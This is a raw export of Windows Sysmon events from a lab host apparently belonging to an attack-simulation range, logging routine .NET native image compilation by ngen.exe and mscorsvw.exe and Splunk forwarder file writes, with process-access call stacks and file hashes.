21:02:05.070{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A14D-60D3-D402-00000000CF01}6632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019406Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:05.070{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A14D-60D3-D402-00000000CF01}6632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019432Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.898{4DB9351A-A14E-60D3-D802-00000000CF01}5708NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\B103MU2MTZ\System.Xml.Serialization.ni.dll.auxMD5=043E8E939A54185178009B5F13EBC49E,SHA256=C5BB6496C4D722EF61AC0146A28F0A869766C5C724C34CB914235F1C13B693B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019431Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.898{4DB9351A-A14E-60D3-D802-00000000CF01}5708NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\B103MU2MTZ\System.Xml.Serialization.ni.dllMD5=0BEC3186FDBBA99DB073799E2C56F8C3,SHA256=7306E0506D9C83DEBF960646E9F78A2DFCFF683B997DF652BEE880F04AB1EF1E,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019430Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:06.883{4DB9351A-A14E-60D3-D802-00000000CF01}5708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\164c-0\System.Xml.Serialization.dll2021-06-23 21:02:06.883 10341000x800000000000000019429Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.836{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A14E-60D3-D802-00000000CF01}5708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019428Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.804{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A14E-60D3-D802-00000000CF01}5708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019427Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.804{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A14E-60D3-D802-00000000CF01}5708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019426Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.758{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A14E-60D3-D702-00000000CF01}4776C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019425Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.758{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A14E-60D3-D702-00000000CF01}4776C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019424Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.758{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A14E-60D3-D702-00000000CF01}4776C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019423Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.695{4DB9351A-A14E-60D3-D602-00000000CF01}3128NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\LT34B5P075\System.Xaml.Hosting.ni.dll.auxMD5=E6D62607E91857B9B7E4E1E94B2430F9,SHA256=793EF573CD8AA241F6A6B06FCC16D5A59986AD7E29449A69B1A98E8F33B1D650,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019422Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.695{4DB9351A-A14E-60D3-D602-00000000CF01}3128NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\LT34B5P075\System.Xaml.Hosting.ni.dllMD5=4C91471BF558E18E3401A8E5360B1926,SHA256=B1A0BFCDFA22A0B52C1344210399BDF47024212E4C5E9035E99D8E096385027D,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019421Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:06.695{4DB9351A-A14E-60D3-D602-00000000CF01}3128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c38-0\System.Xaml.Hosting.dll2021-06-23 21:02:06.679 23542300x800000000000000019420Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.617{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0B8C3B93009ACBDD5F51CBD22BE1E60,SHA256=9831616A515EF7AB306AA3AFA55D71758D5B495A5EF9E5FFD16D57FB4172E5C7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019419Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.617{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A14E-60D3-D602-00000000CF01}3128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019418Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.601{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A14E-60D3-D602-00000000CF01}3128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019417Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.601{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A14E-60D3-D602-00000000CF01}3128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019416Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.523{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A14E-60D3-D502-00000000CF01}4152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019415Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.508{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A14E-60D3-D502-00000000CF01}4152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019414Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.508{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A14E-60D3-D502-00000000CF01}4152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019413Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.429{4DB9351A-A14D-60D3-D402-00000000CF01}6632NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\JLF666LVDJ\System.WorkflowServices.ni.dll.auxMD5=6BA34B96964F969A6B062E5E64CC9D89,SHA256=2C1B52EAD4E6D4CC30E7BF3B2C25902517F25A983C7EE2F8DCD97A25A8D13C75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019412Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.429{4DB9351A-A14D-60D3-D402-00000000CF01}6632NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\JLF666LVDJ\System.WorkflowServices.ni.dllMD5=AE413991E0181FA472F33A8233D00EEB,SHA256=532F6270CDD22480EE70B6A9AD2A18062C59E1A831AD9E5F59DAAFE12C3329A3,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019411Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:06.367{4DB9351A-A14D-60D3-D402-00000000CF01}6632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\19e8-0\System.WorkflowServices.dll2021-06-23 21:02:06.367 10341000x800000000000000019480Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.773{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A14F-60D3-DD02-00000000CF01}3336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019479Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.758{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A14F-60D3-DD02-00000000CF01}3336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019478Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.758{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A14F-60D3-DD02-00000000CF01}3336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019477Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.648{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E00425DE3339FB010CC262CFDE52701,SHA256=4C2A559C2774AF6B9A33E193BD15001E8F3B921A7A31F1ED1F0102EFDE212EAC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019476Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.601{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A14F-60D3-DC02-00000000CF01}6976C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019475Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.586{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A14F-60D3-DC02-00000000CF01}6976C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019474Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.586{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A14F-60D3-DC02-00000000CF01}6976C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019473Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.539{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E77B7870B9C50325E251AF41C1297EE9,SHA256=EFE0F4637710FC9CF6997BAC35EF5AA3839F61425A0EE24A929A18BDC959FAD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019472Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.523{4DB9351A-A14F-60D3-DB02-00000000CF01}6544NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\CT5DBQT78A\UIAutomationClient.ni.dll.auxMD5=1B04600FE3C4F8E57FBEEEFC3983E933,SHA256=231DD0317EA9B37566B31036BDC812FDA72A1DA8945B0FDD45050FDD6ACEE2B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019471Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 